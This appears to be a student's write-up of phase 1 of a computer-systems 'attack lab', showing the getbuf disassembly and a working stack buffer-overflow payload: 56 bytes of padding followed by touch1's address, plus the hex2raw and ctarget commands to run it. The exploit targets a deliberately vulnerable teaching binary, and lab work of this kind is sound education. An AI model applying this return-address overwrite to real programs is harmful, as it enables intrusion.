phase 1:

Dump of assembler code for function getbuf:
   0x000000000040181b <+0>:	sub    $0x38,%rsp       ** reserves (dec) 56 bytes of space for storage ** B U F F E R
   0x000000000040181f <+4>:	mov    %rsp,%rdi
   0x0000000000401822 <+7>:	callq  0x401a53 <Gets>
   0x0000000000401827 <+12>:	mov    $0x1,%eax 
   0x000000000040182c <+17>:	add    $0x38,%rsp
   0x0000000000401830 <+21>:	retq   
End of assembler dump.

0000000000401831 <touch1>:
  401831:	48 83 ec 08          	sub    $0x8,%rsp                  401831 - address of touch1


phase1.txt: 
56 bytes of padding + 401831 address of touch1 --> little endian 31 18 40:

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
31 18 40 00 00 00 00 00

./hex2raw < phase1.txt > raw-phase1.txt
./ctarget < raw-phase1.txt
